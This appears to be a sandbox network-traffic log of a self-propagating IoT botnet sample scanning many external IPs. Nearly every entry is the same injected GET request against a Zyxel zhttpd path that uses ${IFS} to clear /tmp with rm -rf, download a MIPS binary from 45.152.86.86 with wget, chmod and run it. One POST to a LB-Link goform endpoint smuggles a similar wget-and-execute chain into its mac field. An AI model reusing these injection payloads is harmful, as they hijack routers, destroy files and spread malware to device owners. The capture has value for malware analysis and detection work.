                                        Mar 31, 2024 09:21:54.302318096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6345192.168.2.233363639.21.126.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302376032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6346192.168.2.234658261.111.3.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302406073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6347192.168.2.2356112175.124.114.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302474976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6348192.168.2.234643432.223.18.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302503109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6349192.168.2.234663065.209.111.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302531004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6350192.168.2.2353252112.48.49.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.302593946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6351192.168.2.2360710115.156.56.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.308703899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6352192.168.2.2360650205.96.195.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.309609890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6353192.168.2.235360614.61.30.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.309634924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6354192.168.2.2334002192.205.111.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.309672117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6355192.168.2.2359210169.212.166.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.309720993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6356192.168.2.2352110164.81.65.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.309765100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6357192.168.2.2342940146.210.222.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.309808969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6358192.168.2.2336212119.146.103.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.309833050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6359192.168.2.2339028130.151.242.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.309879065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6360192.168.2.2339428110.152.221.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.309928894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6361192.168.2.233766872.79.43.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.309966087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6362192.168.2.2334512151.126.124.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.310009956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6363192.168.2.2347920169.19.44.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.310058117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6364192.168.2.2351744153.86.63.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.310086012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6365192.168.2.233304297.36.89.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.310122013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6366192.168.2.2338178155.109.75.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.310158968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6367192.168.2.2344916120.153.73.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.310213089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6368192.168.2.2351274223.54.11.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.310256958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6369192.168.2.2355964111.208.233.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.310295105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6370192.168.2.2354940119.125.53.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.310337067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6371192.168.2.234597261.52.230.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:55.319649935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6372192.168.2.235877424.156.227.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:55.319694996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6373192.168.2.2350906104.139.18.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:55.319741011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6374192.168.2.233412061.105.32.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:55.319907904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6375192.168.2.2351360136.53.82.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:55.319940090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6376192.168.2.2335068211.63.158.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:55.319981098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6377192.168.2.2351744165.253.23.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:55.339922905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6378192.168.2.2348448123.136.154.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:56.349297047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6379192.168.2.2337018131.92.159.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:56.349334955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6380192.168.2.23485664.185.171.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:56.349370956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6381192.168.2.2351992194.242.148.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:56.349414110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6382192.168.2.235334058.226.123.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:56.349463940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6383192.168.2.234531091.32.64.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:56.349499941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6384192.168.2.2333212136.75.203.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:56.349539042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6385192.168.2.2345078147.229.91.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:56.349776983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6386192.168.2.2338144115.28.131.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:56.349833012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6387192.168.2.233540636.34.148.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:56.349860907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6388192.168.2.2348030191.172.149.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:57.359826088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6389192.168.2.2355170108.142.185.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:57.359893084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6390192.168.2.234913014.65.118.1518080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:57.940393925 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:58.228537083 CEST103INHTTP/1.1 404 Not Found
                                        Content-Type: text/plain
                                        Content-Length: 30
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6391192.168.2.2338546113.238.6.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:58.370109081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6392192.168.2.2355948209.221.238.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:58.370196104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6393192.168.2.234271653.87.171.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:58.370361090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6394192.168.2.2336778119.56.243.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381097078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6395192.168.2.2360100104.139.192.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381138086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6396192.168.2.2336038165.158.137.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381165028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6397192.168.2.234701039.176.147.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381215096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6398192.168.2.2351136169.158.62.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381253958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6399192.168.2.233720649.124.195.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381283045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6400192.168.2.235074251.137.201.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381319046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6401192.168.2.2340196156.165.99.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381388903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6402192.168.2.2340748145.118.150.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381421089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6403192.168.2.2351570122.195.178.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381448984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6404192.168.2.233416467.203.57.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381503105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6405192.168.2.2341720213.162.164.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381581068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6406192.168.2.2359010134.59.165.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381613970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6407192.168.2.2341758155.181.96.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381655931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6408192.168.2.233890024.250.42.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381710052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6409192.168.2.233488823.231.143.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:59.381742954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6410192.168.2.2355684146.142.21.68443
                                        TimestampBytes transferredDirectionData
